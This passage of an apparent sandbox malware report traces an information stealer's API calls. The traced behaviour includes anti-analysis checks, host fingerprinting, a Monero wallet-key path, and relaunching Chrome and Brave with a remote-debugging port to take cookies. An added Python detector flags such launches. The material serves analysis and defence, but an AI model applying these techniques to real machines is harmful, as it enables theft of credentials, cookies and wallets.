                                        • CloseHandle.KERNEL32(?,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196DBA
                                        • ExitProcess.KERNEL32 ref: 00196DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2931873225-0
                                        • Opcode ID: 614cdb5702da0361674be11ce374ae9627443737f54671e3178f55d49c35b62e
                                        • Instruction ID: 1dd115ed0102335c8a7fc46549fb65c81cf24b44a6d6f08a50f33eeed6f4d979
                                        • Opcode Fuzzy Hash: 614cdb5702da0361674be11ce374ae9627443737f54671e3178f55d49c35b62e
                                        • Instruction Fuzzy Hash: 9A31FA71E04208ABCF04FBF0DC56AEE7379AF24741F904968F11266192DF706A09CBA6

                                        Control-flow Graph
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00196D99
                                        • Sleep.KERNEL32(00001770), ref: 00196DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196DBA
                                        • ExitProcess.KERNEL32 ref: 00196DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 122dca8c4eb92c72a3b507e748de9fd59c62cd26b67f45a9a0bc2d4334c70c92
                                        • Instruction ID: c7b8b80ec931a76dd98332e15adfb8d1fed99f6c1d65c993af22bb2a5762403c
                                        • Opcode Fuzzy Hash: 122dca8c4eb92c72a3b507e748de9fd59c62cd26b67f45a9a0bc2d4334c70c92
                                        • Instruction Fuzzy Hash: C5F08230A48309AFEF04BBE0EC0ABBD33B4AF14702F200535F522A51D5CBB0A500CAB5

                                        Control-flow Graph
                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: e1cab4e083f7b8b472d5fb2da74f71c0b6646eddff9cfc19bff14324ce6ae39e
                                        • Instruction ID: 0e9e0d1f4c7d82d8aaf1cdce00910050a3a66f9b4174c9861a12c82a67fd70e6
                                        • Opcode Fuzzy Hash: e1cab4e083f7b8b472d5fb2da74f71c0b6646eddff9cfc19bff14324ce6ae39e
                                        • Instruction Fuzzy Hash: B9214FB1D00209ABDF14DFA4E845ADE7B75FF44321F108625F915A72C1EB706A09CF91

                                        Control-flow Graph
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                          • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                          • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                          • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                          • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                          • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 26d8e563e845fd8421564f48a6e2f7dd45363c3e2e6cd73d04ec3815036915bc
                                        • Instruction ID: 82c5789417711186deadaf5f12794351546bb3aac8c53a306127af0542931cec
                                        • Opcode Fuzzy Hash: 26d8e563e845fd8421564f48a6e2f7dd45363c3e2e6cd73d04ec3815036915bc
                                        • Instruction Fuzzy Hash: C6110C30900108ABDF18FFA4DD92AED7379AF60340F904568F91A5B492EF30AB09CBD5

                                        Control-flow Graph (nodes marked Executed / Not Executed)
                                        control_flow_graph 1493 181220-181247 call 198b40 GlobalMemoryStatusEx 1496 181249-181271 call 19dd30 * 2 1493->1496 1497 181273-18127a 1493->1497 1498 181281-181285 1496->1498 1497->1498 1500 18129a-18129d 1498->1500 1501 181287 1498->1501 1503 181289-181290 1501->1503 1504 181292-181294 ExitProcess 1501->1504 1503->1500 1503->1504
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                        • ExitProcess.KERNEL32 ref: 00181294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 803317263-2766056989
                                        • Opcode ID: 70013fe0e1e74b9349114c1f463af339f45d41cba10dc2637a1f4432f206c67d
                                        • Instruction ID: d9e3cb023833956481217387499e0743a9a42438a481ca95ca0cfba7c2e03a16
                                        • Opcode Fuzzy Hash: 70013fe0e1e74b9349114c1f463af339f45d41cba10dc2637a1f4432f206c67d
                                        • Instruction Fuzzy Hash: 3F0162B1D40308BADF10EFE4DC49BADB77DAB14705F208458F604B61C0C77456428B59
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: abee761302f2c7ec800f84324a138aa6f65488c55a1f1f4b2acc7fd8cfe87891
                                        • Instruction ID: 988f7b742a1df8e9bef355f2b4ce6520ba076365f9bf668cf25fc8b010337399
                                        • Opcode Fuzzy Hash: abee761302f2c7ec800f84324a138aa6f65488c55a1f1f4b2acc7fd8cfe87891
                                        • Instruction Fuzzy Hash: C40186B1A08349ABCB04CF98DD45BAEBBB8FB04711F100169F505E32C0D7745A00C7A1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                        • ExitProcess.KERNEL32 ref: 00181143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 67005cb764f2891d1e55ec21ea91791b8996a3d39277072d5964f3da299eee2d
                                        • Instruction ID: d152669793198200b547af0da828960186950f07972a322bc17fbdaf40b1d0d3
                                        • Opcode Fuzzy Hash: 67005cb764f2891d1e55ec21ea91791b8996a3d39277072d5964f3da299eee2d
                                        • Instruction Fuzzy Hash: E7E08671989308FBE7106BA0AC0EB0C776C9B04B02F1001A4F708761D1C7B466408A5C
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001810B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001810F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: acf469407b62ad9ad1f557708b775350ace8a7e7d2b0206cd3d0039ef64e04d8
                                        • Instruction ID: eacd90b7c8d0b77e1b46533e1aba802604059fd9fb58cc8e77719715eb068dba
                                        • Opcode Fuzzy Hash: acf469407b62ad9ad1f557708b775350ace8a7e7d2b0206cd3d0039ef64e04d8
                                        • Instruction Fuzzy Hash: 63F082B2641318BBEB14AAB4AC59FAEB79CE705B05F300458F505E7281D6719F009BA4
                                        APIs
                                          • Part of subcall function 00197A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                          • Part of subcall function 00197A70: RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                          • Part of subcall function 00197A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                          • Part of subcall function 001979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                          • Part of subcall function 001979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                          • Part of subcall function 001979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                        • ExitProcess.KERNEL32 ref: 001811C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 41450a53093b43faa8309dd118e520921156f9ba1d6e08ab1e23b7288a37d938
                                        • Instruction ID: 716897d00f0b7f0ecbc633baa79a319e08c6c1c449807c2e2ef02681a882aa27
                                        • Opcode Fuzzy Hash: 41450a53093b43faa8309dd118e520921156f9ba1d6e08ab1e23b7288a37d938
                                        • Instruction Fuzzy Hash: 6AE0ECA6D1430162CE1077B47C0AB1A328C5B2565BF040824F905C2143EF25E9014669
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,001A0B32,001A0B2F,00000000,?,?,?,001A1450,001A0B2E), ref: 0018BEC5
                                        • StrCmpCA.SHLWAPI(?,001A1454), ref: 0018BF33
                                        • StrCmpCA.SHLWAPI(?,001A1458), ref: 0018BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 0018C8BB
                                        Strings
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C495
                                        • Preferences, xrefs: 0018C104
                                        • Brave, xrefs: 0018C0E8
                                        • \Brave\Preferences, xrefs: 0018C1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0018C534
                                        • Google Chrome, xrefs: 0018C6F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 00f6c974e6ca7abfb521c96a93fff849d3bea57684713d8843a80faf46096893
                                        • Instruction ID: 1ad05af30fbd6326f4cdf15ec5edeeffd754bde8e1498c23a5ac4c90ea0bc9be
                                        • Opcode Fuzzy Hash: 00f6c974e6ca7abfb521c96a93fff849d3bea57684713d8843a80faf46096893
                                        • Instruction Fuzzy Hash: A352EF729101089BCF14FB60DD96EEE737DAF65301F8045A8B50A66091EF34AB4CCFA6
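The three xrefs to `--remote-debugging-port=9229 --profile-directory="` in the function above sit next to the strings `Brave`, `Google Chrome` and `\Brave\Preferences`: this is the argument string a Chromium-family browser is started with so that its DevTools endpoint listens on localhost port 9229, after which a local process can request the session's cookies over the DevTools protocol instead of decrypting the cookie database itself. When hunting for this, the event to look for is a browser started with a remote-debugging switch by something other than the shell or the browser itself. The following Python is an added example written for this page, not code from the Joe Sandbox report or from the sample; the log format (tab-separated Image, ParentImage, CommandLine), the sample events and the browser and switch lists are constructed assumptions.

```python
import re

# Chromium-family browser executables (assumed list, extend as needed).
CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}

# Switches that expose the DevTools protocol to local clients.
SUSPICIOUS_SWITCHES = {"--remote-debugging-port", "--remote-debugging-pipe", "--remote-allow-origins"}

# Chromium switch syntax: --name or --name=value, value optionally double-quoted.
SWITCH_RE = re.compile(r'--([a-z][a-z0-9-]*)(?:=("[^"]*"|\S*))?')


def basename(path):
    """Lower-cased file name of a Windows path (also tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_switches(command_line):
    """Map switch name -> value ('' for flags without a value), quotes stripped."""
    return {name: (value or "").strip('"') for name, value in SWITCH_RE.findall(command_line)}


def analyze_event(image, parent_image, command_line):
    """Return a finding dict if a Chromium browser was started with a remote-debugging
    switch, else None."""
    name = basename(image)
    if name not in CHROMIUM_BROWSERS:
        return None
    switches = parse_switches(command_line)
    hit = sorted(s for s in switches if "--" + s in SUSPICIOUS_SWITCHES)
    if not hit:
        return None
    parent = basename(parent_image)
    return {
        "browser": name,
        "parent": parent,
        "switches": hit,
        "port": switches.get("remote-debugging-port"),
        "profile": switches.get("profile-directory"),
        # A relaunch by the shell or by another instance of the browser is far less
        # alarming than a launch from an arbitrary user-writable location.
        "parent_is_browser_or_shell": parent in CHROMIUM_BROWSERS or parent == "explorer.exe",
    }


def analyze_log(lines):
    """Run analyze_event over tab-separated 'Image\\tParentImage\\tCommandLine' records."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        image, parent, cmd = line.rstrip("\n").split("\t", 2)
        finding = analyze_event(image, parent, cmd)
        if finding:
            findings.append(finding)
    return findings


# Constructed process-creation events (not taken from the report): one normal
# Chrome start, one Chrome start with the debugging switches from a temp-folder
# parent, one Brave renderer child, and a non-browser carrying the same switch.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BRAVE = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
SAMPLE_LOG = [
    "\t".join([CHROME, r"C:\Windows\explorer.exe", '"' + CHROME + '"']),
    "\t".join([CHROME, r"C:\Users\user\AppData\Local\Temp\dropper.exe",
               '"' + CHROME + '" --remote-debugging-port=9229 --profile-directory="Default" --headless']),
    "\t".join([BRAVE, BRAVE, '"' + BRAVE + '" --type=renderer --profile-directory="Default"']),
    "\t".join([r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
               "notepad.exe --remote-debugging-port=9229"]),
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

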